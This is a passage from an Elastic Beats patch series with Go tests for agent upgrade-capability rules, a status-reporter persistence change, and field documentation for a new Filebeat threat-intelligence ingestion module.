ta := &testUpgradeAction{version: "9.0.0"} + outAfter, err := cap.Apply(ta) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - version mismmatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "${version} == '7.12.0'", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.0.0"} + outAfter, err := cap.Apply(ta) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - version bug allowed minor mismatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.0.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.1.0"} + outAfter, err := cap.Apply(ta) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - version minor allowed major mismatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "7.157.0"} + outAfter, err := cap.Apply(ta) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid action - version minor allowed minor upgrade", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + ta := &testUpgradeAction{version: "8.2.0"} + outAfter, err := cap.Apply(ta) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, ta, outAfter) + }) + + t.Run("valid fleetatpi.action - version match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{ + ActionID: "", + ActionType: "", + Version: "8.2.0", + SourceURI: "http://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("valid fleetatpi.action - version mismmatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := &fleetapi.ActionUpgrade{ + Version: "9.0.0", + SourceURI: "http://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("valid fleetatpi.action - version mismmatch", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "match(${version}, '8.*.*')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{ + Version: "9.0.0", + SourceURI: "http://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Error(t, err, "should fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("valid action - source uri trusted", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "startsWith(${source_uri}, 'https')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{ + Version: "9.0.0", + SourceURI: "https://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("valid action - source uri untrusted", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "startsWith(${source_uri}, 'https')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{ + Version: "9.0.0", + SourceURI: "http://artifacts.elastic.co", + } + outAfter, err := cap.Apply(apiAction) + + assert.Equal(t, ErrBlocked, err, "should be blocking") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) + + t.Run("unknown action", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &upgradeCapability{ + Type: "allow", + UpgradeEqlDefinition: "startsWith(${source_uri}, 'https')", + }, + }, + } + cap, err := newUpgradesCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionPolicyChange{} + outAfter, err := cap.Apply(apiAction) + + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.NoError(t, err, "should not fail") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) +} + +type testUpgradeAction struct { + version string +} + +// Version to upgrade to. +func (a *testUpgradeAction) Version() string { + return a.version +} + +// SourceURI for download. +func (a *testUpgradeAction) SourceURI() string { + return "http://artifacts.elastic.co" +} diff --git a/x-pack/elastic-agent/pkg/core/status/reporter.go b/x-pack/elastic-agent/pkg/core/status/reporter.go index 9c061b06e002..2d3517a434f3 100644 --- a/x-pack/elastic-agent/pkg/core/status/reporter.go +++ b/x-pack/elastic-agent/pkg/core/status/reporter.go @@ -38,6 +38,7 @@ var ( // Controller takes track of component statuses. type Controller interface { Register(string) Reporter + RegisterWithPersistance(string, bool) Reporter Status() AgentStatus StatusString() string UpdateStateID(string) @@ -77,7 +78,9 @@ func (r *controller) UpdateStateID(stateID string) { } rep.lock.Lock() - rep.status = Healthy + if !rep.isPersistent { + rep.status = Healthy + } rep.lock.Unlock() } r.lock.Unlock() @@ -87,6 +90,10 @@ func (r *controller) UpdateStateID(stateID string) { // Register registers new component for status updates. func (r *controller) Register(componentIdentifier string) Reporter { + return r.RegisterWithPersistance(componentIdentifier, false) +} + +func (r *controller) RegisterWithPersistance(componentIdentifier string, persistent bool) Reporter { id := componentIdentifier + "-" + uuid.New().String()[:8] rep := &reporter{ isRegistered: true, @@ -96,6 +103,7 @@ func (r *controller) Register(componentIdentifier string) Reporter { r.lock.Unlock() }, notifyChangeFunc: r.updateStatus, + isPersistent: persistent, } r.lock.Lock() @@ -159,6 +167,7 @@ type Reporter interface { type reporter struct { lock sync.Mutex + isPersistent bool isRegistered bool status AgentStatus unregisterFunc func() From 70d00b94161e72ae00001403ec7c089116eb2733 Mon Sep 17 00:00:00 2001 From: Marius Iversen Date: Mon, 15 Feb 2021 15:20:16 +0100 Subject: [PATCH 39/63] [Filebeat][New Module] Threat intel module for filebeat (#21795) * inital MVP commit for threat intel module for filebeat * Fixing typos based on PR comments * adding converter for larted field * adding concept for a new MISP module * setting correct field type for misp group sharing id * setting timestamp to age of attribute timestamp * stashing initial support for AlienVault OTX * add threatintel.otx to timestamp bypass for testing * stashing upcoming changes for new httpjson format * updating settings with pagination * big overwrite of the whole module to fit the new TI ECS fields, add new test data, and make the ingest pipelines more sturdy * update default url for anomali * updating field names based on feedback * final commit fixing certain bugs, adding the missing field mapping etc * updating field defintion, it had a duplicate field * updating the anomali config to access the header in a safer way, allowing for special characters * added stripping of null values and made sure it looked at the correct document field * updating field mapping to default_field false * updating default config descriptions * disable default_field for top group * updating changelog * adding fallback for uri_parts when using older ES version * updating test_modules to ignore timestamps * adding support for uri_parts for all relevant ingest pipelines, and fallbacks * updating default config templates and docs based on PR comments * Update x-pack/filebeat/module/threatintel/_meta/docs.asciidoc Co-authored-by: Adrian Serrano * mage update Co-authored-by: Adrian Serrano --- CHANGELOG.next.asciidoc | 1 + filebeat/docs/fields.asciidoc | 1418 +++++++ filebeat/docs/modules/threatintel.asciidoc | 314 ++ filebeat/docs/modules_list.asciidoc | 2 + filebeat/tests/system/test_modules.py | 6 +- x-pack/filebeat/filebeat.reference.yml | 96 + x-pack/filebeat/include/list.go | 1 + .../module/threatintel/_meta/config.yml | 94 + .../module/threatintel/_meta/docs.asciidoc | 301 ++ .../module/threatintel/_meta/fields.yml | 365 ++ .../threatintel/abusemalware/_meta/fields.yml | 34 + .../abusemalware/config/config.yml | 42 + .../abusemalware/ingest/pipeline.yml | 138 + .../threatintel/abusemalware/manifest.yml | 16 + .../test/abusechmalware.ndjson.log | 25 + .../abusechmalware.ndjson.log-expected.json | 735 ++++ .../threatintel/abuseurl/_meta/fields.yml | 49 + .../threatintel/abuseurl/config/config.yml | 42 + .../threatintel/abuseurl/ingest/pipeline.yml | 123 + .../module/threatintel/abuseurl/manifest.yml | 16 + .../abuseurl/test/abusechurl.ndjson.log | 670 ++++ .../test/abusechurl.ndjson.log-expected.json | 3397 ++++++++++++++++ .../threatintel/anomali/_meta/fields.yml | 53 + .../threatintel/anomali/config/config.yml | 63 + .../threatintel/anomali/ingest/pipeline.yml | 131 + .../module/threatintel/anomali/manifest.yml | 20 + .../anomali/test/anomali_limo.ndjson.log | 642 ++++ .../anomali_limo.ndjson.log-expected.json | 3412 +++++++++++++++++ x-pack/filebeat/module/threatintel/fields.go | 23 + .../module/threatintel/misp/_meta/fields.yml | 165 + .../module/threatintel/misp/config/config.yml | 72 + .../threatintel/misp/ingest/pipeline.yml | 293 ++ .../module/threatintel/misp/manifest.yml | 20 + .../misp/test/misp_sample.ndjson.log | 15 + .../test/misp_sample.ndjson.log-expected.json | 743 ++++ x-pack/filebeat/module/threatintel/module.yml | 1 + .../module/threatintel/otx/_meta/fields.yml | 29 + .../module/threatintel/otx/config/config.yml | 60 + .../threatintel/otx/ingest/pipeline.yml | 162 + .../module/threatintel/otx/manifest.yml | 20 + .../otx/test/otx_sample.ndjson.log | 80 + .../test/otx_sample.ndjson.log-expected.json | 1493 ++++++++ .../modules.d/threatintel.yml.disabled | 97 + 43 files changed, 15478 insertions(+), 1 deletion(-) create mode 100644 filebeat/docs/modules/threatintel.asciidoc create mode 100644 x-pack/filebeat/module/threatintel/_meta/config.yml create mode 100644 x-pack/filebeat/module/threatintel/_meta/docs.asciidoc create mode 100644 x-pack/filebeat/module/threatintel/_meta/fields.yml create mode 100644 x-pack/filebeat/module/threatintel/abusemalware/_meta/fields.yml create mode 100644 x-pack/filebeat/module/threatintel/abusemalware/config/config.yml create mode 100644 x-pack/filebeat/module/threatintel/abusemalware/ingest/pipeline.yml create mode 100644 x-pack/filebeat/module/threatintel/abusemalware/manifest.yml create mode 100644 x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log create mode 100644 x-pack/filebeat/module/threatintel/abusemalware/test/abusechmalware.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/threatintel/abuseurl/_meta/fields.yml create mode 100644 x-pack/filebeat/module/threatintel/abuseurl/config/config.yml create mode 100644 x-pack/filebeat/module/threatintel/abuseurl/ingest/pipeline.yml create mode 100644 x-pack/filebeat/module/threatintel/abuseurl/manifest.yml create mode 100644 x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log create mode 100644 x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/threatintel/anomali/_meta/fields.yml create mode 100644 x-pack/filebeat/module/threatintel/anomali/config/config.yml create mode 100644 x-pack/filebeat/module/threatintel/anomali/ingest/pipeline.yml create mode 100644 x-pack/filebeat/module/threatintel/anomali/manifest.yml create mode 100644 x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log create mode 100644 x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/threatintel/fields.go create mode 100644 x-pack/filebeat/module/threatintel/misp/_meta/fields.yml create mode 100644 x-pack/filebeat/module/threatintel/misp/config/config.yml create mode 100644 x-pack/filebeat/module/threatintel/misp/ingest/pipeline.yml create mode 100644 x-pack/filebeat/module/threatintel/misp/manifest.yml create mode 100644 x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log create mode 100644 x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log-expected.json create mode 100644 x-pack/filebeat/module/threatintel/module.yml create mode 100644 x-pack/filebeat/module/threatintel/otx/_meta/fields.yml create mode 100644 x-pack/filebeat/module/threatintel/otx/config/config.yml create mode 100644 x-pack/filebeat/module/threatintel/otx/ingest/pipeline.yml create mode 100644 x-pack/filebeat/module/threatintel/otx/manifest.yml create mode 100644 x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log create mode 100644 x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log-expected.json create mode 100644 x-pack/filebeat/modules.d/threatintel.yml.disabled diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index da96341ff564..21ce698db828 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -817,6 +817,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added support for first_event context in filebeat httpjson input {pull}23437[23437] - Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] - Added `alternative_host` option to google pubsub input {pull}23215[23215] +- Adding Threat Intel module {pull}21795[21795] - Added username parsing from Cisco ASA message 302013. {pull}21196[21196] - Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] - Added support for Cisco AMP API as a new fileset. {pull}22768[22768] diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index 76f3dc5a38af..2a4e439452b4 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -84,6 +84,7 @@ grouped in the following categories: * <> * <> * <> +* <> * <> * <> * <> @@ -143032,6 +143033,1423 @@ alias to: message -- +[[exported-fields-threatintel]] +== threatintel fields + +Threat intelligence Filebeat Module. + + + +[float] +=== threatintel + +Fields from the threatintel Filebeat module. + + + +*`threatintel.indicator.first_seen`*:: ++ +-- +The date and time when intelligence source first reported sighting this indicator. + + +type: keyword + +-- + +*`threatintel.indicator.last_seen`*:: ++ +-- +The date and time when intelligence source last reported sighting this indicator. + + +type: date + +-- + +*`threatintel.indicator.sightings`*:: ++ +-- +Number of times this indicator was observed conducting threat activity. + + +type: long + +-- + +*`threatintel.indicator.type`*:: ++ +-- +Type of indicator as represented by Cyber Observable in STIX 2.0. Expected values + * autonomous-system + * artifact + * directory + * domain-name + * email-addr + * file + * ipv4-addr + * ipv6-addr + * mac-addr + * mutex + * process + * software + * url + * user-account + * windows-registry-key + * x-509-certificate + + +type: keyword + +-- + +*`threatintel.indicator.description`*:: ++ +-- +Describes the type of action conducted by the threat. + + +type: keyword + +-- + +*`threatintel.indicator.scanner_stats`*:: ++ +-- +Count of AV/EDR vendors that successfully detected malicious file or URL. + + +type: long + +-- + +*`threatintel.indicator.provider`*:: ++ +-- +Identifies the name of the intelligence provider. + + +type: keyword + +-- + +*`threatintel.indicator.confidence`*:: ++ +-- +Identifies the confidence rating assigned by the provider using STIX confidence scales. Expected values + * Not Specified, None, Low, Medium, High + * 0-10 + * Admirality Scale (1-6) + * DNI Scale (5-95) + * WEP Scale (Impossible - Certain) + + +type: keyword + +-- + +*`threatintel.indicator.module`*:: ++ +-- +Identifies the name of specific module this data is coming from. + + +type: keyword + +-- + +*`threatintel.indicator.dataset`*:: ++ +-- +Identifies the name of specific dataset from the intelligence source. + + +type: keyword + +-- + +*`threatintel.indicator.ip`*:: ++ +-- +Identifies a threat indicator as an IP address (irrespective of direction). + + +type: ip + +-- + +*`threatintel.indicator.domain`*:: ++ +-- +Identifies a threat indicator as a domain (irrespective of direction). + + +type: keyword + +-- + +*`threatintel.indicator.port`*:: ++ +-- +Identifies a threat indicator as a port number (irrespective of direction). + + +type: long + +-- + +*`threatintel.indicator.email.address`*:: ++ +-- +Identifies a threat indicator as an email address (irrespective of direction). + + +type: keyword + +-- + +*`threatintel.indicator.marking.tlp`*:: ++ +-- +Traffic Light Protocol sharing markings. Expected values are: + * White + * Green + * Amber + * Red + + +type: keyword + +-- + + +*`threatintel.indicator.matched.atomic`*:: ++ +-- +Identifies the atomic indicator that matched a local environment endpoint or network event. + + +type: keyword + +-- + +*`threatintel.indicator.matched.field`*:: ++ +-- +Identifies the field of the atomic indicator that matched a local environment endpoint or network event. + + +type: keyword + +-- + +*`threatintel.indicator.matched.type`*:: ++ +-- +Identifies the type of the atomic indicator that matched a local environment endpoint or network event. + + +type: keyword + +-- + + +*`threatintel.indicator.as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`threatintel.indicator.as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`threatintel.indicator.as.organization.name.text`*:: ++ +-- +type: text + +-- + + +*`threatintel.indicator.registry.data.strings`*:: ++ +-- +Content when writing string types. Populated as an array when writing string data to the registry. For single string registry types (REG_SZ, REG_EXPAND_SZ), this should be an array with one string. For sequences of string with REG_MULTI_SZ, this array will be variable length. For numeric data, such as REG_DWORD and REG_QWORD, this should be populated with the decimal representation (e.g `"1"`). + + +type: keyword + +example: ["C:\rta\red_ttp\bin\myapp.exe"] + +-- + +*`threatintel.indicator.registry.path`*:: ++ +-- +Full path, including hive, key and value + +type: keyword + +example: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe\Debugger + +-- + +*`threatintel.indicator.registry.value`*:: ++ +-- +Name of the value written. + +type: keyword + +example: Debugger + +-- + +*`threatintel.indicator.registry.key`*:: ++ +-- +Registry key value + +type: keyword + +-- + + +*`threatintel.indicator.geo.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`threatintel.indicator.geo.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`threatintel.indicator.geo.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`threatintel.indicator.geo.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`threatintel.indicator.geo.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`threatintel.indicator.geo.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`threatintel.indicator.file.pe.imphash`*:: ++ +-- +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. + +type: keyword + +example: 0c6803c4e922103c4dca5963aad36ddf + +-- + + + +*`threatintel.indicator.file.hash.tlsh`*:: ++ +-- +The file's import tlsh, if available. + + +type: keyword + +-- + +*`threatintel.indicator.file.hash.ssdeep`*:: ++ +-- +The file's ssdeep hash, if available. + + +type: keyword + +-- + +*`threatintel.indicator.file.hash.md5`*:: ++ +-- +The file's md5 hash, if available. + + +type: keyword + +-- + +*`threatintel.indicator.file.hash.sha1`*:: ++ +-- +The file's sha1 hash, if available. + + +type: keyword + +-- + +*`threatintel.indicator.file.hash.sha256`*:: ++ +-- +The file's sha256 hash, if available. + + +type: keyword + +-- + +*`threatintel.indicator.file.hash.sha512`*:: ++ +-- +The file's sha512 hash, if available. + + +type: keyword + +-- + +*`threatintel.indicator.file.type`*:: ++ +-- +The file type + + +type: keyword + +-- + +*`threatintel.indicator.file.size`*:: ++ +-- +The file's total size + + +type: long + +-- + +*`threatintel.indicator.file.name`*:: ++ +-- +The file's name + + +type: keyword + +-- + + +*`threatintel.indicator.url.domain`*:: ++ +-- +Domain of the url, such as "www.elastic.co". + + +type: keyword + +-- + +*`threatintel.indicator.url.extension`*:: ++ +-- +The field contains the file extension from the original request + + +type: keyword + +-- + +*`threatintel.indicator.url.fragment`*:: ++ +-- +Portion of the url after the `#`, such as "top". + + +type: keyword + +-- + +*`threatintel.indicator.url.full`*:: ++ +-- +If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. + + +type: keyword + +-- + +*`threatintel.indicator.url.original`*:: ++ +-- +Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. + + +type: keyword + +-- + +*`threatintel.indicator.url.password`*:: ++ +-- +Password of the request. + + +type: keyword + +-- + +*`threatintel.indicator.url.path`*:: ++ +-- +Path of the request, such as "/search". + + +type: keyword + +-- + +*`threatintel.indicator.url.port`*:: ++ +-- +Port of the request, such as 443. + + +type: long + +format: string + +-- + +*`threatintel.indicator.url.query`*:: ++ +-- +The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. + + +type: keyword + +-- + +*`threatintel.indicator.url.registered_domain`*:: ++ +-- +The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + + +type: keyword + +-- + +*`threatintel.indicator.url.scheme`*:: ++ +-- +Scheme of the request, such as "https". + + +type: keyword + +-- + +*`threatintel.indicator.url.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + + +type: keyword + +-- + +*`threatintel.indicator.url.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + + +type: keyword + +-- + +*`threatintel.indicator.url.username`*:: ++ +-- +Username of the request. + + +type: keyword + +-- + + +*`threatintel.indicator.x509.serial_number`*:: ++ +-- +Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. + +type: keyword + +example: 55FBB9C7DEBF09809D12CCAA + +-- + +*`threatintel.indicator.x509.issuer`*:: ++ +-- +Name of issuing certificate authority. Could be either Distinguished Name (DN) or Common Name (CN), depending on source. + +type: keyword + +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA + +-- + +*`threatintel.indicator.x509.subject`*:: ++ +-- +Name of the certificate subject entity. Could be either Distinguished Name (DN) or Common Name (CN), depending on source. + +type: keyword + +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + +-- + +*`threatintel.indicator.x509.alternative_names`*:: ++ +-- +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. + +type: keyword + +example: *.elastic.co + +-- + +[float] +=== abusemalware + +Fields for AbuseCH Malware Threat Intel + + + +*`threatintel.abusemalware.file_type`*:: ++ +-- +File type guessed by URLhaus. + + +type: keyword + +-- + +*`threatintel.abusemalware.signature`*:: ++ +-- +Malware familiy. + + +type: keyword + +-- + +*`threatintel.abusemalware.urlhaus_download`*:: ++ +-- +Location (URL) where you can download a copy of this file. + + +type: keyword + +-- + +*`threatintel.abusemalware.virustotal.result`*:: ++ +-- +AV detection ration. + + +type: keyword + +-- + +*`threatintel.abusemalware.virustotal.percent`*:: ++ +-- +AV detection in percent. + + +type: float + +-- + +*`threatintel.abusemalware.virustotal.link`*:: ++ +-- +Link to the Virustotal report. + + +type: keyword + +-- + +[float] +=== abuseurl + +Fields for AbuseCH Malware Threat Intel + + + +*`threatintel.abuseurl.id`*:: ++ +-- +The ID of the url. + + +type: keyword + +-- + +*`threatintel.abuseurl.urlhaus_reference`*:: ++ +-- +Link to URLhaus entry. + + +type: keyword + +-- + +*`threatintel.abuseurl.url_status`*:: ++ +-- +The current status of the URL. Possible values are: online, offline and unknown. + + +type: keyword + +-- + +*`threatintel.abuseurl.threat`*:: ++ +-- +The threat corresponding to this malware URL. + + +type: keyword + +-- + +*`threatintel.abuseurl.blacklists.surbl`*:: ++ +-- +SURBL blacklist status. Possible values are: listed and not_listed + + +type: keyword + +-- + +*`threatintel.abuseurl.blacklists.spamhaus_dbl`*:: ++ +-- +Spamhaus DBL blacklist status. + + +type: keyword + +-- + +*`threatintel.abuseurl.reporter`*:: ++ +-- +The Twitter handle of the reporter that has reported this malware URL (or anonymous). + + +type: keyword + +-- + +*`threatintel.abuseurl.larted`*:: ++ +-- +Indicates whether the malware URL has been reported to the hosting provider (true or false) + + +type: boolean + +-- + +*`threatintel.abuseurl.tags`*:: ++ +-- +A list of tags associated with the queried malware URL + + +type: keyword + +-- + +[float] +=== anomali + +Fields for Anomali Threat Intel + + + +*`threatintel.anomali.id`*:: ++ +-- +The ID of the indicator. + + +type: keyword + +-- + +*`threatintel.anomali.name`*:: ++ +-- +The name of the indicator. + + +type: keyword + +-- + +*`threatintel.anomali.pattern`*:: ++ +-- +The pattern ID of the indicator. + + +type: keyword + +-- + +*`threatintel.anomali.valid_from`*:: ++ +-- +When the indicator was first found or is considered valid. + + +type: date + +-- + +*`threatintel.anomali.modified`*:: ++ +-- +When the indicator was last modified + + +type: date + +-- + +*`threatintel.anomali.labels`*:: ++ +-- +The labels related to the indicator + + +type: keyword + +-- + +*`threatintel.anomali.indicator`*:: ++ +-- +The value of the indicator, for example if the type is domain, this would be the value. + + +type: keyword + +-- + +*`threatintel.anomali.description`*:: ++ +-- +A description of the indicator. + + +type: keyword + +-- + +*`threatintel.anomali.title`*:: ++ +-- +Title describing the indicator. + + +type: keyword + +-- + +*`threatintel.anomali.content`*:: ++ +-- +Extra text or descriptive content related to the indicator. + + +type: keyword + +-- + +*`threatintel.anomali.type`*:: ++ +-- +The indicator type, can for example be "domain, email, FileHash-SHA256". + + +type: keyword + +-- + +*`threatintel.anomali.object_marking_refs`*:: ++ +-- +The STIX reference object. + + +type: keyword + +-- + +[float] +=== misp + +Fields for MISP Threat Intel + + + +*`threatintel.misp.id`*:: ++ +-- +Attribute ID. + + +type: keyword + +-- + +*`threatintel.misp.orgc_id`*:: ++ +-- +Organization Community ID of the event. + + +type: keyword + +-- + +*`threatintel.misp.org_id`*:: ++ +-- +Organization ID of the event. + + +type: keyword + +-- + +*`threatintel.misp.threat_level_id`*:: ++ +-- +Threat level from 5 to 1, where 1 is the most critical. + + +type: long + +-- + +*`threatintel.misp.info`*:: ++ +-- +Additional text or information related to the event. + + +type: keyword + +-- + +*`threatintel.misp.published`*:: ++ +-- +When the event was published. + + +type: boolean + +-- + +*`threatintel.misp.uuid`*:: ++ +-- +The UUID of the event object. + + +type: keyword + +-- + +*`threatintel.misp.date`*:: ++ +-- +The date of when the event object was created. + + +type: date + +-- + +*`threatintel.misp.attribute_count`*:: ++ +-- +How many attributes are included in a single event object. + + +type: long + +-- + +*`threatintel.misp.timestamp`*:: ++ +-- +The timestamp of when the event object was created. + + +type: date + +-- + +*`threatintel.misp.distribution`*:: ++ +-- +Distribution type related to MISP. + + +type: keyword + +-- + +*`threatintel.misp.proposal_email_lock`*:: ++ +-- +Settings configured on MISP for email lock on this event object. + + +type: boolean + +-- + +*`threatintel.misp.locked`*:: ++ +-- +If the current MISP event object is locked or not. + + +type: boolean + +-- + +*`threatintel.misp.publish_timestamp`*:: ++ +-- +At what time the event object was published + + +type: date + +-- + +*`threatintel.misp.sharing_group_id`*:: ++ +-- +The ID of the grouped events or sources of the event. + + +type: keyword + +-- + +*`threatintel.misp.disable_correlation`*:: ++ +-- +If correlation is disabled on the MISP event object. + + +type: boolean + +-- + +*`threatintel.misp.extends_uuid`*:: ++ +-- +The UUID of the event object it might extend. + + +type: keyword + +-- + +*`threatintel.misp.org.id`*:: ++ +-- +The 